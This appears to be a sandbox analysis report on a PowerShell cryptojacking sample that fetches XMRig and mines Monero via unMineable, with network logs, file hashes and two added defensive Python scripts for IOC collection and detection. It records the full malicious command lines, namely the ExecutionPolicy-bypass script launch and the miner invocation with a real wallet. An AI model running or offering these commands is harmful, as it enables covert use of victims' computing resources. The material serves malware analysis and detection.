C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4568-4-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/4568-5-0x0000018C419C0000-0x0000018C419E2000-memory.dmp

memory/4568-7-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-10-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-9-0x0000018C41B70000-0x0000018C41BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plo22vtq.fa5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4568-25-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-48-0x0000018C41B50000-0x0000018C41B62000-memory.dmp

memory/4568-61-0x0000018C41B30000-0x0000018C41B3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4160-90-0x000002D6C4030000-0x000002D6C4050000-memory.dmp

memory/4160-91-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4568-92-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/4568-93-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4160-94-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4568-95-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4160-96-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-97-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-98-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-99-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-100-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-101-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-102-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-103-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-104-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-105-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-106-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-107-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-108-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-109-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-110-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-111-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-112-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-113-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-114-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-115-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-116-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-117-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-118-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-119-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-120-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-121-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-122-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-123-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-124-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-125-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-126-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-127-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-128-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-129-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-130-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-131-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-132-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-133-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-134-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-135-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-136-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-137-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-138-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-139-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-140-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-141-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-142-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-143-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-144-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-145-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-146-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-147-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-148-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-149-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-150-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-151-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-152-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-153-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-154-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-155-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-156-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp
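
Two dropped files are hashed in each run. The xmrig.exe hashes are identical in every run on this page, so they collapse to a single IOC. The __PSScriptPolicyTest_*.ps1 file is PowerShell's own probe, written to %TEMP% to test whether AppLocker or WDAC policy blocks script execution; the MD5, SHA1 and SHA256 recorded for it in this run are exactly those of the one-byte content "1", so it is not an attacker artifact. The other runs on this page record a different hash for their probe file, and the check below reports that as unverified rather than guessing at the content. The script is an added example, not part of the sandbox report; the records are copied from the Files sections of behavioral9, behavioral12 and behavioral15.

```python
"""Classify the dropped files listed in this report and collapse repeated
payload hashes into one IOC per file.  Added example, not report or XMRig code."""
import hashlib
import re

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
# Hashes copied from the report; xmrig.exe carries the same values in every run.
XMRIG_HASHES = {"md5": "205ad9eb6acd6f58752899669b69fe74",
                "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
                "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"}
DROPPED = [
    {"run": "behavioral9", "path": TEMP + r"\__PSScriptPolicyTest_plo22vtq.fa5.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"run": "behavioral12", "path": TEMP + r"\__PSScriptPolicyTest_dh2blbzd.dw1.ps1",
     "md5": "d17fe0a3f47be24a6453e9ef58c94641",
     "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
] + [{"run": run, "path": TEMP + r"\xmrig-6.21.3\xmrig.exe", **XMRIG_HASHES}
     for run in ("behavioral9", "behavioral12", "behavioral15")]

# PowerShell names its policy probe __PSScriptPolicyTest_<random>.<random>.ps1
POLICY_PROBE = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)
ALGOS = ("md5", "sha1", "sha256")


def digests(data):
    """md5/sha1/sha256 of a byte string, keyed like the report's hash table."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ALGOS}


ONE = digests(b"1")  # the probe file's content when PowerShell writes it


def classify(rec):
    """Tell PowerShell's own probe file apart from a genuinely dropped payload."""
    name = rec["path"].rsplit("\\", 1)[-1]
    if POLICY_PROBE.match(name):
        same = all(rec[algo] == ONE[algo] for algo in ALGOS)
        return "ps_policy_probe_verified" if same else "ps_policy_probe_unverified"
    return "dropped_payload"


def ioc_set(records):
    """One IOC per distinct payload sha256, remembering which runs produced it."""
    iocs = {}
    for rec in records:
        if classify(rec) != "dropped_payload":
            continue
        ioc = iocs.setdefault(rec["sha256"], {"name": rec["path"].rsplit("\\", 1)[-1],
                                                "md5": rec["md5"], "sha1": rec["sha1"],
                                                "runs": []})
        ioc["runs"].append(rec["run"])
    return iocs


if __name__ == "__main__":
    for rec in DROPPED:
        print(rec["run"], classify(rec), rec["path"])
    for sha256, ioc in ioc_set(DROPPED).items():
        print(sha256, ioc["name"], "seen in", len(ioc["runs"]), "runs")
```

Only sha256 is used as the IOC key; md5 and sha1 are kept because most blocklists and threat-intel feeds still accept them.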

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:53

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, every column N/A: the payload signature matched but no description, indicator, process or target was recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2836-0-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dh2blbzd.dw1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2836-6-0x0000022F5A530000-0x0000022F5A552000-memory.dmp

memory/2836-10-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-11-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-12-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-14-0x0000022F5A720000-0x0000022F5A732000-memory.dmp

memory/2836-15-0x0000022F5A710000-0x0000022F5A71A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/448-46-0x00000182C3EF0000-0x00000182C3F10000-memory.dmp

memory/448-47-0x00000183564C0000-0x00000183564E0000-memory.dmp

memory/448-48-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/2836-50-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/448-49-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/2836-51-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

memory/448-53-0x0000018356900000-0x0000018356920000-memory.dmp

memory/2836-52-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/448-54-0x0000018356B30000-0x0000018356B50000-memory.dmp

memory/448-55-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-56-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-57-0x0000018356900000-0x0000018356920000-memory.dmp

memory/448-58-0x0000018356B30000-0x0000018356B50000-memory.dmp

memory/448-59-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-60-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-61-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-62-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-63-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-64-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-65-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-66-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-67-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-68-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-69-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-70-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-71-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-72-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-73-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-74-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-75-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-76-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-77-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-78-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-79-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-80-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-81-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-82-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-83-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-84-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-85-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-86-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-87-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-88-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-89-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-90-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-91-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-92-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-93-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-94-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-95-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-96-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-97-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-98-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-99-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-100-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-101-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-102-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-103-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-104-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-105-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-106-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-107-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-108-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-109-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-110-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-111-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-112-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-113-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-114-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-115-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-116-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-117-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:56

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, every column N/A: the payload signature matched but no description, indicator, process or target was recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
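
The two command lines above are the whole infection chain this run shows: a PowerShell script in the user's Temp folder is started with the execution policy bypassed, and it launches the XMRig 6.21.3 binary fetched from GitHub against the unMineable pool over TLS (stratum+ssl, port 443) with a Monero wallet, a worker name and the placeholder password "x". The SeLockMemoryPrivilege rows under AdjustPrivilegeToken are XMRig enabling large pages for its RandomX dataset, which is why that privilege appears next to the miner rather than the script. The script below is an added example, not part of the sandbox report or of XMRig: it parses the miner command line into its mining parameters and flags both processes from Sysmon-style process-creation events. The event list and its ParentImage values are constructed; the option table covers only XMRig's common value-taking switches.

```python
"""Parse the miner launch recorded in this report and flag it from
process-creation telemetry.  Added example, not sandbox or XMRig code."""
import re
from urllib.parse import urlsplit

# Command lines copied from the Processes section of this report.
PS_CMD = (r'powershell.exe -ExecutionPolicy bypass -File '
          r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"')
XMRIG_CMD = (r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
             r'-o stratum+ssl://rx.unmineable.com:443 '
             r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac '
             r'-p x')

# Constructed process-creation events (Sysmon Event ID 1 fields).  The report
# shows only the two processes; the ParentImage values are assumptions.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": PS_CMD},
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": XMRIG_CMD},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

# XMRig switches that take a value, short and long spellings (flags like -k are ignored).
VALUE_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
              "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass",
              "--coin": "coin", "-t": "threads", "--threads": "threads"}
# Standard Monero address: 95 chars of Monero base58, starting with 4 (or 8 for subaddresses).
MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [t[1:-1] if len(t) > 1 and t[0] == t[-1] == '"' else t
            for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_xmrig_cmdline(cmdline):
    """Return the mining parameters of an XMRig-style command line, or None."""
    toks = tokenize(cmdline)
    opts = {}
    i = 1
    while i < len(toks):
        name, eq, val = toks[i].partition("=")
        if eq and name in VALUE_OPTS:              # --url=host:port form
            opts[VALUE_OPTS[name]] = val
            i += 1
        elif toks[i] in VALUE_OPTS and i + 1 < len(toks):
            opts[VALUE_OPTS[toks[i]]] = toks[i + 1]
            i += 2
        else:
            i += 1
    url = opts.get("url")
    if not url:
        return None
    u = urlsplit(url if "://" in url else "stratum+tcp://" + url)  # -o accepts bare host:port
    if not u.scheme.startswith("stratum") or not u.hostname:
        return None
    user = opts.get("user", "")
    # unMineable users look like COIN:ADDRESS.WORKER; plain pools use ADDRESS[.WORKER]
    coin, _, rest = user.partition(":") if re.match(r"[A-Z0-9]{2,6}:", user) else ("", "", user)
    wallet, _, worker = rest.partition(".")
    return {"image": toks[0], "algo": opts.get("algo"), "pool_host": u.hostname,
            "pool_port": u.port, "tls": u.scheme == "stratum+ssl", "coin": coin,
            "wallet": wallet, "worker": worker, "password": opts.get("pass"),
            "wallet_is_monero": bool(MONERO_ADDR.fullmatch(wallet))}


def triage(events):
    """Return (rule, detail) findings for a list of process-creation events."""
    findings = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        toks = tokenize(ev["CommandLine"])
        low = [t.lower() for t in toks]
        if image == "powershell.exe":
            # -ExecutionPolicy may be abbreviated (-ex, -ep); the value must be bypass
            bypass = any(t.startswith(("-ex", "-ep")) and low[i + 1:i + 2] == ["bypass"]
                         for i, t in enumerate(low))
            temp_script = [t for t in toks if t.lower().endswith(".ps1")
                           and "\\appdata\\local\\temp\\" in t.lower()]
            if bypass and temp_script:
                findings.append(("powershell_bypass_temp_script", temp_script[0]))
        miner = parse_xmrig_cmdline(ev["CommandLine"])
        if miner:                                  # matched on options, so renamed binaries count too
            findings.append(("stratum_miner_cmdline",
                             f"{miner['pool_host']}:{miner['pool_port']} tls={miner['tls']} "
                             f"coin={miner['coin'] or '?'} worker={miner['worker'] or '?'} "
                             f"parent={ev.get('ParentImage', '?')}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(rule, detail)
```

The miner rule keys on the stratum URL and wallet-style user field rather than on the file name, so it still fires when the binary is renamed; the wallet and worker strings are what to pivot on across runs and across hosts.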

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 138.91.171.81:80 - tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
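
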